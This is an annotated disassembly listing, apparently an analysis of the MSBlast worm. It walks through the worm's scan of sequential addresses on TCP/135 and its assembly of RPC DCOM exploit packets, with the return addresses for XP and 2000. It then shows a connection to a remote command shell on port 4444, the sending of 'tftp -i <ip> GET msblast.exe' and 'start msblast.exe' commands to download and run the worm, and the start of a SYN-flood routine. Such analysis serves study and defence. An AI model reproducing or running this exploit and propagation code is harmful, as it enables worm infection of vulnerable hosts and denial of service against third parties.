.text:0040170C cmp ds:octet4, 0FEh
.text:00401716 jle short loc_401727 ; increment 4th octet and stop if in range [0-254]
.text:00401718 and ds:octet4, 0 ; 4th octet rolls over to 0; increment 3rd octet
.text:0040171F inc ds:octet3
.text:00401725 jmp short loc_40172F ; stop if octet3 is now in range [0-254]
.text:00401727 ; ---------------------------------------------------------------------------
.text:00401727
.text:00401727 loc_401727: ; CODE XREF: incrementOctets+A^j
.text:00401727 inc ds:octet4 ; increment 4th octet and stop if in range [0-254]
.text:0040172D jmp short locret_401776 ; return
.text:0040172F ; ---------------------------------------------------------------------------
.text:0040172F
.text:0040172F loc_40172F: ; CODE XREF: incrementOctets+19^j
.text:0040172F cmp ds:octet3, 0FEh ; stop if octet3 is now in range [0-254]
.text:00401739 jle short locret_401776 ; return
.text:0040173B and ds:octet3, 0 ; 3rd octet rolls over to 0; increment 2nd octet
.text:00401742 inc ds:octet2
.text:00401748 cmp ds:octet2, 0FEh ; stop if octet2 is now in range [0-254]
.text:00401752 jle short locret_401776 ; return
.text:00401754 and ds:octet2, 0 ; 2nd octet rolls over to 0; increment 1st octet
.text:0040175B inc ds:octet1
.text:00401761 cmp ds:octet1, 0FEh ; keep 1st octet if now in range [0-254];
.text:0040176B jle short loc_401774 ; increment 4th octet again so addr is never x.0.0.0
.text:0040176D and ds:octet1, 0 ; otherwise, 1st octet rolls over to 0
.text:00401774
.text:00401774 loc_401774: ; CODE XREF: incrementOctets+5F^j
.text:00401774 jmp short incrementOctets ; increment 4th octet again so addr is never x.0.0.0
.text:00401776 ; ---------------------------------------------------------------------------
.text:00401776
.text:00401776 locret_401776: ; CODE XREF: incrementOctets+21^j
.text:00401776 ; incrementOctets+2D^j ...
.text:00401776 retn ; return
.text:00401776 incrementOctets endp
.text:00401776
.text:00401777
.text:00401777 ; =============== S U B R O U T I N E =======================================
.text:00401777
.text:00401777 ; Attributes: bp-based frame
.text:00401777
.text:00401777 infect20Hosts proc near ; CODE XREF: WinMain+312^p
.text:00401777
.text:00401777 var_18C = dword ptr -18Ch
.text:00401777 writefds = fd_set ptr -188h
.text:00401777 var_84 = byte ptr -84h
.text:00401777 in = in_addr ptr -80h
.text:00401777 namelen = dword ptr -74h
.text:00401777 argp = dword ptr -70h
.text:00401777 name = sockaddr ptr -6Ch
.text:00401777 timeout = timeval ptr -5Ch
.text:00401777 var_54 = dword ptr -54h
.text:00401777 s = dword ptr -50h
.text:00401777
.text:00401777 push ebp
.text:00401778 mov ebp, esp
.text:0040177A sub esp, 18Ch
.text:00401780 push ebx
.text:00401781 push esi
.text:00401782 push edi
.text:00401783 mov [ebp+argp], 1 ; set argp for ioctlsocket() to 1 (on)
.text:0040178A push 10h
.text:0040178C push 0
.text:0040178E lea eax, [ebp+name]
.text:00401791 push eax
.text:00401792 call memset
.text:00401797 add esp, 0Ch
.text:0040179A mov [ebp+name.sa_family], 2 ; AF_INET
.text:004017A0 push 87h ; hostshort = port TCP/135
.text:004017A5 call htons
.text:004017AA mov esi, eax
.text:004017AC mov word ptr [ebp+name.sa_data], si
.text:004017B0 xor edi, edi
.text:004017B2
.text:004017B2 Create 20 non-blocking TCP/IP sockets
.text:004017B2
.text:004017B2 loc_4017B2: ; CODE XREF: infect20Hosts+6Bvj
.text:004017B2 push 0 ; protocol = IPPROTO_IP
.text:004017B4 push 1 ; type = SOCK_STREAM
.text:004017B6 push 2 ; af = AF_INET
.text:004017B8 call socket
.text:004017BD mov [ebp+edi*4+s], eax
.text:004017C1 cmp [ebp+edi*4+s], 0FFFFFFFFh
.text:004017C6 jz loc_401924 ; return
.text:004017CC lea eax, [ebp+argp]
.text:004017CF push eax ; argp = 1 (on)
.text:004017D0 push 8004667Eh ; cmd = FIONBIO
.text:004017D5 push [ebp+edi*4+s] ; s[EDI]
.text:004017D9 call ioctlsocket
.text:004017DE inc edi
.text:004017DF cmp edi, 14h
.text:004017E2 jl short loc_4017B2 ; loop 20 times
.text:004017E4 xor edi, edi
.text:004017E6
.text:004017E6 Try to connect sockets to port TCP/135 on 20 sequential IP addresses
.text:004017E6
.text:004017E6 loc_4017E6: ; CODE XREF: infect20Hosts+CDvj
.text:004017E6 call incrementOctets ; connect loop -- executed 20 times
.text:004017EB push ds:octet4
.text:004017F1 push ds:octet3
.text:004017F7 push ds:octet2
.text:004017FD push ds:octet1
.text:00401803 push offset aI_I_I_I ; "%i.%i.%i.%i"
.text:00401808 push offset cp
.text:0040180D call sprintf ; convert four octets into a string
.text:00401812 add esp, 18h
.text:00401815 push offset cp ; cp
.text:0040181A call inet_addr ; now convert string into DWORD
.text:0040181F mov [ebp+var_54], eax
.text:00401822 cmp eax, 0FFFFFFFFh
.text:00401825 jz loc_401924 ; return
.text:0040182B mov eax, [ebp+var_54]
.text:0040182E mov dword ptr [ebp+name.sa_data+2], eax
.text:00401831 push 10h ; namelen
.text:00401833 lea eax, [ebp+name]
.text:00401836 push eax ; name
.text:00401837 push [ebp+edi*4+s] ; s[EDI]
.text:0040183B call connect
.text:00401840 inc edi
.text:00401841 cmp edi, 14h
.text:00401844 jl short loc_4017E6 ; connect loop -- executed 20 times
.text:00401846 push 708h ; dwMilliseconds
.text:0040184B call Sleep ; wait 1.8 seconds
.text:00401850 xor edi, edi
.text:00401852
.text:00401852 Look for connected sockets by doing a select() on each s[EDI] (EDI=0..19)
.text:00401852
.text:00401852 loc_401852: ; CODE XREF: infect20Hosts+1A7vj
.text:00401852 and [ebp+timeout.tv_sec], 0
.text:00401856 and [ebp+timeout.tv_usec], 0 ; zero out timeval struct
.text:00401856 ; (timeout of 0 = return instantly)
.text:0040185A and [ebp+writefds.fd_count], 0 ; FD_ZERO(&writefds)
.text:00401861
.text:00401861 --- start of FD_SET macro code
.text:00401861
.text:00401861 and [ebp+var_18C], 0 ; FD_SET(s[EDI], &writefds)
.text:00401868 jmp short loc_401883
.text:0040186A ; ---------------------------------------------------------------------------
.text:0040186A
.text:0040186A loc_40186A: ; CODE XREF: infect20Hosts+118vj
.text:0040186A mov esi, [ebp+var_18C]
.text:00401870 mov ebx, [ebp+edi*4+s] ; EDI = index into s[] socket array
.text:00401870 ; EBX = socket s[EDI]
.text:00401874 cmp [ebp+esi*4+writefds.fd_array], ebx
.text:0040187B jz short loc_401891
.text:0040187D inc [ebp+var_18C]
.text:00401883
.text:00401883 loc_401883: ; CODE XREF: infect20Hosts+F1^j
.text:00401883 mov eax, [ebp+writefds.fd_count]
.text:00401889 cmp [ebp+var_18C], eax
.text:0040188F jb short loc_40186A
.text:00401891
.text:00401891 loc_401891: ; CODE XREF: infect20Hosts+104^j
.text:00401891 mov eax, [ebp+writefds.fd_count]
.text:00401897 cmp [ebp+var_18C], eax
.text:0040189D jnz short loc_4018BB
.text:0040189F cmp eax, 40h
.text:004018A2 jnb short loc_4018BB
.text:004018A4 mov esi, [ebp+var_18C]
.text:004018AA mov ebx, [ebp+edi*4+s]
.text:004018AE mov [ebp+esi*4+writefds.fd_array], ebx
.text:004018B5 inc [ebp+writefds.fd_count]
.text:004018B5
.text:004018B5 --- end of FD_SET macro code
.text:004018BB
.text:004018BB loc_4018BB: ; CODE XREF: infect20Hosts+126^j
.text:004018BB ; infect20Hosts+12B^j
.text:004018BB lea eax, [ebp+timeout]
.text:004018BE push eax ; timeout
.text:004018BF push 0 ; exceptfds
.text:004018C1 lea eax, [ebp+writefds]
.text:004018C7 push eax ; writefds
.text:004018C8 push 0 ; readfds
.text:004018CA push 0 ; nfds
.text:004018CC call select ; writefds will be list of connected sockets
.text:004018D1 cmp eax, 1
.text:004018D4 jge short loc_4018E1 ; is s[EDI] writable, i.e. has connect() completed?
.text:004018D6 push [ebp+edi*4+s] ; s
.text:004018DA call closesocket ; close s[EDI] if not connected (select() returned 0 or -1)
.text:004018DF jmp short loc_40191A ; advance to next iteration of loop
.text:004018E1 ; ---------------------------------------------------------------------------
.text:004018E1
.text:004018E1 loc_4018E1: ; CODE XREF: infect20Hosts+15D^j
.text:004018E1 mov [ebp+namelen], 10h
.text:004018E8 lea eax, [ebp+namelen]
.text:004018EB push eax ; namelen
.text:004018EC lea eax, [ebp+var_84]
.text:004018F2 push eax ; name
.text:004018F3 push [ebp+edi*4+s] ; s
.text:004018F7 call getpeername
.text:004018FC push dword ptr [ebp+in.S_un] ; in
.text:004018FF call inet_ntoa
.text:00401904 push eax ; szIPAddr: string representation of IP address to infect
.text:00401905 push [ebp+edi*4+s] ; s: socket connected to remote TCP/135
.text:00401909 call infectTarget ; infect a single host by sending command
.text:00401909 ; shell exploit and issuing command to
.text:00401909 ; download worm executable via TFTP
.text:0040190E add esp, 8
.text:00401911 push [ebp+edi*4+s] ; s
.text:00401915 call closesocket ; close TCP/135 socket
.text:0040191A
.text:0040191A loc_40191A: ; CODE XREF: infect20Hosts+168^j
.text:0040191A inc edi
.text:0040191B cmp edi, 14h
.text:0040191E jl loc_401852 ; check each of the 20 sockets in array for connection
.text:00401924
.text:00401924 loc_401924: ; CODE XREF: infect20Hosts+4F^j
.text:00401924 ; infect20Hosts+AE^j
.text:00401924 pop edi ; return
.text:00401925 pop esi
.text:00401926 pop ebx
.text:00401927 leave
.text:00401928 retn
.text:00401928 infect20Hosts endp
.text:00401928
.text:00401929
.text:00401929 ; =============== S U B R O U T I N E =======================================
.text:00401929
.text:00401929 ; Attributes: bp-based frame
.text:00401929
.text:00401929 ; int __cdecl infectTarget(SOCKET s,char *szIPAddr)
.text:00401929 infectTarget proc near ; CODE XREF: infect20Hosts+192^p
.text:00401929
.text:00401929 ThreadId = dword ptr -1934h
.text:00401929 var_1930 = dword ptr -1930h
.text:00401929 namelen = dword ptr -192Ch
.text:00401929 var_1928 = byte ptr -1928h
.text:00401929 var_18F8 = byte ptr -18F8h
.text:00401929 var_18BC = byte ptr -18BCh
.text:00401929 buf = byte ptr -155Ch
.text:00401929 var_1514 = dword ptr -1514h
.text:00401929 argp = dword ptr -1510h
.text:00401929 var_150C = byte ptr -150Ch
.text:00401929 var_14E8 = byte ptr -14E8h
.text:00401929 hObject = dword ptr -1240h
.text:00401929 var_123C = dword ptr -123Ch
.text:00401929 name = sockaddr ptr -1238h
.text:00401929 var_1228 = byte ptr -1228h
.text:00401929 var_1224 = byte ptr -1224h
.text:00401929 var_1223 = byte ptr -1223h
.text:00401929 var_1222 = byte ptr -1222h
.text:00401929 var_1221 = byte ptr -1221h
.text:00401929 var_1218 = dword ptr -1218h
.text:00401929 var_1210 = dword ptr -1210h
.text:00401929 var_1208 = dword ptr -1208h
.text:00401929 var_1204 = byte ptr -1204h
.text:00401929 len = dword ptr -1004h
.text:00401929 var_1000 = byte ptr -1000h
.text:00401929 var_FF8 = dword ptr -0FF8h
.text:00401929 var_FF0 = dword ptr -0FF0h
.text:00401929 var_F80 = dword ptr -0F80h
.text:00401929 var_F7C = dword ptr -0F7Ch
.text:00401929 var_F4C = dword ptr -0F4Ch
.text:00401929 var_F48 = dword ptr -0F48h
.text:00401929 var_F30 = dword ptr -0F30h
.text:00401929 var_E74 = dword ptr -0E74h
.text:00401929 s = dword ptr 8
.text:00401929 szIPAddr = dword ptr 0Ch
.text:00401929
.text:00401929 push ebp ; save frame pointer (IDA's "flags" label is spurious here)
.text:0040192A mov ebp, esp
.text:0040192C mov eax, 2934h
.text:00401931 call allocstackspace ; used when > 4KB stack space needed
.text:00401936 push ebx ; save callee-saved registers; the len/buf/s labels IDA
.text:00401937 push esi ; attached to these pushes belong to the later send()
.text:00401938 push edi ; call, not to the prologue
.text:00401939 and [ebp+argp], 0 ; set argp for ioctlsocket() to 0 (off)
.text:00401940 lea eax, [ebp+argp]
.text:00401946 push eax ; argp = 0 (off)
.text:00401947 push 8004667Eh ; cmd = FIONBIO
.text:0040194C push [ebp+s] ; s
.text:0040194F call ioctlsocket ; make sure socket does blocking I/O
.text:00401954 cmp ds:dwWhichRetAddr, 1 ; 80% chance set to 1 (XP), 20% set to 2 (2000)
.text:0040195B jnz short loc_401969 ; 2000 "universal" return address (20% probability)
.text:0040195B ; 0018759Fh is a "CALL EBX" in unicode.nls
.text:0040195D
.text:0040195D Assemble RPC DCOM exploit packets
.text:0040195D
.text:0040195D mov [ebp+var_1514], 100139Dh ; XP "universal" return address (80% probability)
.text:0040195D ; 0100139Dh is a "CALL EBX" in svchost.exe
.text:00401967 jmp short loc_401973
.text:00401969 ; ---------------------------------------------------------------------------
.text:00401969
.text:00401969 loc_401969: ; CODE XREF: infectTarget+32^j
.text:00401969 mov [ebp+var_1514], 18759Fh ; 2000 "universal" return address (20% probability)
.text:00401969 ; 0018759Fh is a "CALL EBX" in unicode.nls
.text:00401973
.text:00401973 loc_401973: ; CODE XREF: infectTarget+3E^j
.text:00401973 lea edi, [ebp+buf]
.text:00401979 lea esi, ds:4040C0h ; bindstr[]
.text:0040197F mov ecx, 12h ; size = 0048h (72)
.text:00401984 rep movsd
.text:00401986 lea edi, [ebp+var_18BC]
.text:0040198C lea esi, ds:404108h ; request1[]
.text:00401992 mov ecx, 0D8h ; size = 0360h (864)
.text:00401997 rep movsd
.text:00401999 lea edi, [ebp+var_1218]
.text:0040199F lea esi, ds:404468h ; request2[]
.text:004019A5 mov ecx, 4 ; size = 0010h (16)
.text:004019AA rep movsd
.text:004019AC lea edi, [ebp+var_18F8]
.text:004019B2 lea esi, ds:404478h ; request3[]
.text:004019B8 mov ecx, 0Fh ; size = 003Ch (60)
.text:004019BD rep movsd
.text:004019BF lea edi, [ebp+var_150C]
.text:004019C5 lea esi, ds:4044B4h ; sc
.text:004019CB mov ecx, 0B3h ; size = 02CCh (716)
.text:004019D0 rep movsd
.text:004019D2 lea edi, [ebp+var_1928]
.text:004019D8 lea esi, ds:404780h ; request4[]
.text:004019DE mov ecx, 0Ch ; size = 0030h (48)
.text:004019E3 rep movsd
.text:004019E5 push 4
.text:004019E7 lea eax, [ebp+var_1514]
.text:004019ED push eax
.text:004019EE lea eax, [ebp+var_14E8]
.text:004019F4 push eax
.text:004019F5 call memcpy
.text:004019FA mov [ebp+var_1930], 2CCh
.text:00401A04 push 360h
.text:00401A09 lea eax, [ebp+var_18BC]
.text:00401A0F push eax
.text:00401A10 lea eax, [ebp+var_1000]
.text:00401A16 push eax
.text:00401A17 call memcpy
.text:00401A1C mov [ebp+len], 360h
.text:00401A26 add [ebp+var_1218], 166h
.text:00401A30 mov eax, [ebp+var_1210]
.text:00401A36 add eax, 166h
.text:00401A3B mov [ebp+var_1210], eax
.text:00401A41 push 10h
.text:00401A43 lea eax, [ebp+var_1218]
.text:00401A49 push eax
.text:00401A4A lea eax, [ebp+var_1000]
.text:00401A50 add eax, 360h
.text:00401A55 push eax
.text:00401A56 call memcpy
.text:00401A5B mov [ebp+len], 370h
.text:00401A65 push 2CCh
.text:00401A6A lea eax, [ebp+var_150C]
.text:00401A70 push eax
.text:00401A71 lea eax, [ebp+var_1000]
.text:00401A77 add eax, 370h
.text:00401A7C push eax
.text:00401A7D call memcpy
.text:00401A82 mov [ebp+len], 63Ch
.text:00401A8C push 3Ch
.text:00401A8E lea eax, [ebp+var_18F8]
.text:00401A94 push eax
.text:00401A95 lea eax, [ebp+var_1000]
.text:00401A9B add eax, 63Ch
.text:00401AA0 push eax
.text:00401AA1 call memcpy
.text:00401AA6 mov [ebp+len], 678h
.text:00401AB0 push 30h
.text:00401AB2 lea eax, [ebp+var_1928]
.text:00401AB8 push eax
.text:00401AB9 lea eax, [ebp+var_1000]
.text:00401ABF add eax, 678h
.text:00401AC4 push eax
.text:00401AC5 call memcpy
.text:00401ACA add esp, 48h
.text:00401ACD mov [ebp+len], 6A8h
.text:00401AD7 mov eax, [ebp+var_FF8]
.text:00401ADD add eax, 2C0h
.text:00401AE2 mov [ebp+var_FF8], eax
.text:00401AE8 mov eax, [ebp+var_FF0]
.text:00401AEE add eax, 2C0h
.text:00401AF3 mov [ebp+var_FF0], eax
.text:00401AF9 mov eax, [ebp+var_F80]
.text:00401AFF add eax, 2C0h
.text:00401B04 mov [ebp+var_F80], eax
.text:00401B0A mov eax, [ebp+var_F7C]
.text:00401B10 add eax, 2C0h
.text:00401B15 mov [ebp+var_F7C], eax
.text:00401B1B mov eax, [ebp+var_F4C]
.text:00401B21 add eax, 2C0h
.text:00401B26 mov [ebp+var_F4C], eax
.text:00401B2C mov eax, [ebp+var_F48]
.text:00401B32 add eax, 2C0h
.text:00401B37 mov [ebp+var_F48], eax
.text:00401B3D mov eax, [ebp+var_F30]
.text:00401B43 add eax, 2C0h
.text:00401B48 mov [ebp+var_F30], eax
.text:00401B4E mov eax, [ebp+var_E74]
.text:00401B54 add eax, 2C0h
.text:00401B59 mov [ebp+var_E74], eax
.text:00401B5F push 0 ; flags
.text:00401B61 push 48h ; len
.text:00401B63 lea eax, [ebp+buf]
.text:00401B69 push eax ; buf
.text:00401B6A push [ebp+s] ; s
.text:00401B6D call send ; send RPC bind packet (bindstr[])
.text:00401B72 cmp eax, 0FFFFFFFFh
.text:00401B75 jz loc_401E3B ; return
.text:00401B7B push 0 ; flags
.text:00401B7D push [ebp+len] ; len
.text:00401B83 lea eax, [ebp+var_1000]
.text:00401B89 push eax ; buf
.text:00401B8A push [ebp+s] ; s
.text:00401B8D call send ; send assembled DCOM REMACT exploit packet
.text:00401B92 cmp eax, 0FFFFFFFFh
.text:00401B95 jz loc_401E3B ; return
.text:00401B9B push [ebp+s] ; s
.text:00401B9E call closesocket ; close TCP/135 socket
.text:00401BA3 push 190h ; dwMilliseconds
.text:00401BA8 call Sleep ; sleep for 0.4 seconds
.text:00401BAD
.text:00401BAD Connect to remote command shell
.text:00401BAD
.text:00401BAD push 0 ; protocol = IPPROTO_IP (0), as above; TCP is implied by SOCK_STREAM
.text:00401BAF push 1 ; type = SOCK_STREAM
.text:00401BB1 push 2 ; af = AF_INET
.text:00401BB3 call socket ; create new TCP/IP socket for connecting to command shell
.text:00401BB8 mov [ebp+var_1208], eax
.text:00401BBE cmp eax, 0FFFFFFFFh
.text:00401BC1 jz loc_401E3B ; return
.text:00401BC7 push 10h
.text:00401BC9 push 0
.text:00401BCB lea eax, [ebp+name]
.text:00401BD1 push eax
.text:00401BD2 call memset
.text:00401BD7 add esp, 0Ch
.text:00401BDA mov [ebp+name.sa_family], 2
.text:00401BE3 push 115Ch ; hostshort = 4444
.text:00401BE8 call htons
.text:00401BED mov edi, eax
.text:00401BEF mov word ptr [ebp+name.sa_data], di
.text:00401BF6 push [ebp+szIPAddr] ; cp
.text:00401BF9 call inet_addr
.text:00401BFE mov [ebp+var_123C], eax
.text:00401C04 cmp eax, 0FFFFFFFFh
.text:00401C07 jz loc_401E3B ; return
.text:00401C0D mov eax, [ebp+var_123C]
.text:00401C13 mov dword ptr [ebp+name.sa_data+2], eax
.text:00401C19 push 10h ; namelen
.text:00401C1B lea eax, [ebp+name]
.text:00401C21 push eax ; name
.text:00401C22 push [ebp+var_1208] ; s
.text:00401C28 call connect ; attempt to connect to command shell on port TCP/4444
.text:00401C2D cmp eax, 0FFFFFFFFh
.text:00401C30 jz loc_401E3B ; return
.text:00401C36
.text:00401C36 Start TFTP server thread and send TFTP command
.text:00401C36
.text:00401C36 push 10h
.text:00401C38 push 0
.text:00401C3A push offset cp
.text:00401C3F call memset
.text:00401C44 mov [ebp+namelen], 10h
.text:00401C4E push 10h
.text:00401C50 push 0
.text:00401C52 lea eax, [ebp+var_1228]
.text:00401C58 push eax
.text:00401C59 call memset
.text:00401C5E lea eax, [ebp+namelen]
.text:00401C64 push eax ; namelen
.text:00401C65 lea eax, [ebp+var_1228]
.text:00401C6B push eax ; name
.text:00401C6C push [ebp+var_1208] ; s
.text:00401C72 call getsockname
.text:00401C77 movzx eax, [ebp+var_1221]
.text:00401C7E push eax
.text:00401C7F movzx eax, [ebp+var_1222]
.text:00401C86 push eax
.text:00401C87 movzx eax, [ebp+var_1223]
.text:00401C8E push eax
.text:00401C8F movzx eax, [ebp+var_1224]
.text:00401C96 push eax
.text:00401C97 push offset aD_D_D_D ; "%d.%d.%d.%d"
.text:00401C9C push offset cp
.text:00401CA1 call sprintf
.text:00401CA6 add esp, 30h
.text:00401CA9 cmp ds:s, 0
.text:00401CB0 jz short loc_401CBD
.text:00401CB2 push ds:s ; s
.text:00401CB8 call closesocket
.text:00401CBD
.text:00401CBD loc_401CBD: ; CODE XREF: infectTarget+387^j
.text:00401CBD lea eax, [ebp+ThreadId]
.text:00401CC3 push eax ; lpThreadId
.text:00401CC4 push 0 ; dwCreationFlags
.text:00401CC6 push 0 ; lpParameter
.text:00401CC8 push offset TFTPServerThread ; lpStartAddress
.text:00401CCD push 0 ; dwStackSize
.text:00401CCF push 0 ; lpThreadAttributes
.text:00401CD1 call CreateThread
.text:00401CD6 mov [ebp+hObject], eax
.text:00401CDC push 50h ; dwMilliseconds
.text:00401CDE call Sleep ; sleep for 80ms
.text:00401CE3 push offset aMsblast_exe ; "msblast.exe"
.text:00401CE8 push offset cp
.text:00401CED push offset aTftpISGetS ; "tftp -i %s GET %s\n"
.text:00401CF2 lea eax, [ebp+var_1204]
.text:00401CF8 push eax
.text:00401CF9 call sprintf ; create command string for downloading worm exe via TFTP
.text:00401CFE add esp, 10h
.text:00401D01 lea ecx, [ebp+var_1204]
.text:00401D07 or eax, 0FFFFFFFFh
.text:00401D0A
.text:00401D0A loc_401D0A: ; CODE XREF: infectTarget+3E6vj
.text:00401D0A inc eax
.text:00401D0B cmp byte ptr [ecx+eax], 0
.text:00401D0F jnz short loc_401D0A
.text:00401D11 push 0 ; flags
.text:00401D13 push eax ; len
.text:00401D14 lea eax, [ebp+var_1204]
.text:00401D1A push eax ; buf
.text:00401D1B push [ebp+var_1208] ; s
.text:00401D21 call send ; send "tftp -i <myipaddr> GET msblast.exe <enter>" command
.text:00401D26 cmp eax, 1
.text:00401D29 jl loc_401DEB
.text:00401D2F push 3E8h ; dwMilliseconds
.text:00401D34 call Sleep ; sleep for 1 second
.text:00401D39 xor ebx, ebx
.text:00401D3B jmp short loc_401D48
.text:00401D3D ; ---------------------------------------------------------------------------
.text:00401D3D
.text:00401D3D loc_401D3D: ; CODE XREF: infectTarget+42Bvj
.text:00401D3D push 7D0h ; dwMilliseconds
.text:00401D42 call Sleep ; sleep for 2 seconds
.text:00401D47 inc ebx
.text:00401D48
.text:00401D48 loc_401D48: ; CODE XREF: infectTarget+412^j
.text:00401D48 cmp ebx, 0Ah
.text:00401D4B jge short loc_401D56
.text:00401D4D cmp dwTFTPInProgress, 0 ; is TFTP transfer finished?
.text:00401D54 jnz short loc_401D3D ; loop up to 10 times waiting for TFTP server to finish
.text:00401D56
.text:00401D56 loc_401D56: ; CODE XREF: infectTarget+422^j
.text:00401D56 push offset aMsblast_exe ; "msblast.exe"
.text:00401D5B push offset aStartS ; "start %s\n"
.text:00401D60 lea eax, [ebp+var_1204]
.text:00401D66 push eax
.text:00401D67 call sprintf ; create command string
.text:00401D6C add esp, 0Ch
.text:00401D6F lea ecx, [ebp+var_1204]
.text:00401D75 or eax, 0FFFFFFFFh
.text:00401D78
.text:00401D78 loc_401D78: ; CODE XREF: infectTarget+454vj
.text:00401D78 inc eax
.text:00401D79 cmp byte ptr [ecx+eax], 0
.text:00401D7D jnz short loc_401D78
.text:00401D7F push 0 ; flags
.text:00401D81 push eax ; len
.text:00401D82 lea eax, [ebp+var_1204]
.text:00401D88 push eax ; buf
.text:00401D89 push [ebp+var_1208] ; s
.text:00401D8F call send ; send "start msblast.exe <enter>" command
.text:00401D94 cmp eax, 1
.text:00401D97 jl short loc_401DEB
.text:00401D99 push 7D0h ; dwMilliseconds
.text:00401D9E call Sleep ; sleep two seconds
.text:00401DA3 push offset aMsblast_exe ; "msblast.exe"
.text:00401DA8 push offset aS_0 ; "%s\n"
.text:00401DAD lea eax, [ebp+var_1204]
.text:00401DB3 push eax
.text:00401DB4 call sprintf ; create command string
.text:00401DB9 add esp, 0Ch
.text:00401DBC lea ecx, [ebp+var_1204]
.text:00401DC2 or eax, 0FFFFFFFFh
.text:00401DC5
.text:00401DC5 loc_401DC5: ; CODE XREF: infectTarget+4A1vj
.text:00401DC5 inc eax
.text:00401DC6 cmp byte ptr [ecx+eax], 0
.text:00401DCA jnz short loc_401DC5
.text:00401DCC push 0 ; flags
.text:00401DCE push eax ; len
.text:00401DCF lea eax, [ebp+var_1204]
.text:00401DD5 push eax ; buf
.text:00401DD6 push [ebp+var_1208] ; s
.text:00401DDC call send ; now send "msblast.exe <enter>" command
.text:00401DE1 push 7D0h ; dwMilliseconds
.text:00401DE6 call Sleep ; sleep for 2 seconds
.text:00401DEB
.text:00401DEB loc_401DEB: ; CODE XREF: infectTarget+400^j
.text:00401DEB ; infectTarget+46E^j
.text:00401DEB cmp [ebp+var_1208], 0
.text:00401DF2 jz short loc_401DFF
.text:00401DF4 push [ebp+var_1208] ; s
.text:00401DFA call closesocket
.text:00401DFF
.text:00401DFF loc_401DFF: ; CODE XREF: infectTarget+4C9^j
.text:00401DFF cmp dwTFTPInProgress, 0
.text:00401E06 jz short loc_401E27
.text:00401E08 push 0 ; dwExitCode
.text:00401E0A push [ebp+hObject] ; hThread
.text:00401E10 call TerminateThread ; kill TFTP server thread if it's not done already
.text:00401E15 push ds:s ; s
.text:00401E1B call closesocket
.text:00401E20 and dwTFTPInProgress, 0
.text:00401E27
.text:00401E27 loc_401E27: ; CODE XREF: infectTarget+4DD^j
.text:00401E27 cmp [ebp+hObject], 0
.text:00401E2E jz short loc_401E3B ; return
.text:00401E30 push [ebp+hObject] ; hObject
.text:00401E36 call CloseHandle ; close handle to TFTP server thread
.text:00401E3B
.text:00401E3B loc_401E3B: ; CODE XREF: infectTarget+24C^j
.text:00401E3B ; infectTarget+26C^j ...
.text:00401E3B pop edi ; return
.text:00401E3C pop esi
.text:00401E3D pop ebx
.text:00401E3E leave
.text:00401E3F retn
.text:00401E3F infectTarget endp
.text:00401E3F
.text:00401E40
.text:00401E40 ; =============== S U B R O U T I N E =======================================
.text:00401E40
.text:00401E40 ; computeChecksum(lpData, dwLength): one's-complement sum of the 16-bit words at
.text:00401E40 ; lpData (plus a trailing odd byte), carries folded in, complemented, result in AX
.text:00401E40 ; -- the standard Internet checksum (RFC 1071)
.text:00401E40 computeChecksum proc near ; CODE XREF: sendTCP80SYN+1AEvp
.text:00401E40 ; sendTCP80SYN+1EAvp
.text:00401E40
.text:00401E40 lpData = dword ptr 8
.text:00401E40 dwLength = dword ptr 0Ch
.text:00401E40
.text:00401E40 push ebx
.text:00401E41 mov ebx, [esp+lpData]
.text:00401E45 mov ecx, [esp+dwLength]
.text:00401E49 xor edx, edx
.text:00401E4B jmp short loc_401E5A
.text:00401E4D ; ---------------------------------------------------------------------------
.text:00401E4D
.text:00401E4D loc_401E4D: ; CODE XREF: computeChecksum+1Dvj
.text:00401E4D mov eax, ebx
.text:00401E4F add ebx, 2
.text:00401E52 movzx eax, word ptr [eax]
.text:00401E55 add edx, eax
.text:00401E57 sub ecx, 2
.text:00401E5A
.text:00401E5A loc_401E5A: ; CODE XREF: computeChecksum+B^j
.text:00401E5A cmp ecx, 1
.text:00401E5D jg short loc_401E4D
.text:00401E5F or ecx, ecx
.text:00401E61 jz short loc_401E68
.text:00401E63 movzx eax, byte ptr [ebx]
.text:00401E66 add edx, eax
.text:00401E68
.text:00401E68 loc_401E68: ; CODE XREF: computeChecksum+21^j
.text:00401E68 mov ecx, edx
.text:00401E6A shr ecx, 10h
.text:00401E6D mov ebx, edx
.text:00401E6F and ebx, 0FFFFh
.text:00401E75 mov edx, ecx
.text:00401E77 add edx, ebx
.text:00401E79 mov ecx, edx
.text:00401E7B shr ecx, 10h
.text:00401E7E add edx, ecx
.text:00401E80 mov eax, edx
.text:00401E82 not eax
.text:00401E84 and eax, 0FFFFh
.text:00401E89 pop ebx
.text:00401E8A retn
.text:00401E8A computeChecksum endp
.text:00401E8A
.text:00401E8B
.text:00401E8B ; =============== S U B R O U T I N E =======================================
.text:00401E8B
.text:00401E8B ; Attributes: bp-based frame
.text:00401E8B
.text:00401E8B ; int __cdecl lookupIPAddr(char *name)
.text:00401E8B lookupIPAddr proc near ; CODE XREF: WUSYNFloodThread+13vp
.text:00401E8B ; sendTCP80SYN+7Evp
.text:00401E8B
.text:00401E8B name = dword ptr 8
.text:00401E8B
.text:00401E8B push ebp
.text:00401E8C mov ebp, esp
.text:00401E8E push esi
.text:00401E8F push edi
.text:00401E90 push [ebp+name] ; cp
.text:00401E93 call inet_addr
.text:00401E98 mov edi, eax
.text:00401E9A xor esi, esi
.text:00401E9C cmp edi, 0FFFFFFFFh
.text:00401E9F jnz short loc_401EBB
.text:00401EA1 push [ebp+name] ; name
.text:00401EA4 call gethostbyname
.text:00401EA9 mov esi, eax
.text:00401EAB or esi, esi
.text:00401EAD jnz short loc_401EB4
.text:00401EAF or eax, 0FFFFFFFFh
.text:00401EB2 jmp short loc_401EBD
.text:00401EB4 ; ---------------------------------------------------------------------------
.text:00401EB4
.text:00401EB4 loc_401EB4: ; CODE XREF: lookupIPAddr+22^j
.text:00401EB4 mov eax, [esi+0Ch]
.text:00401EB7 mov eax, [eax]
.text:00401EB9 mov edi, [eax]
.text:00401EBB
.text:00401EBB loc_401EBB: ; CODE XREF: lookupIPAddr+14^j
.text:00401EBB mov eax, edi
.text:00401EBD
.text:00401EBD loc_401EBD: ; CODE XREF: lookupIPAddr+27^j
.text:00401EBD pop edi
.text:00401EBE pop esi
.text:00401EBF pop ebp
.text:00401EC0 retn
.text:00401EC0 lookupIPAddr endp
.text:00401EC0
.text:00401EC1
.text:00401EC1 ; =============== S U B R O U T I N E =======================================
.text:00401EC1
.text:00401EC1 ; Attributes: bp-based frame
.text:00401EC1
.text:00401EC1 ; DWORD __stdcall WUSYNFloodThread(LPVOID)
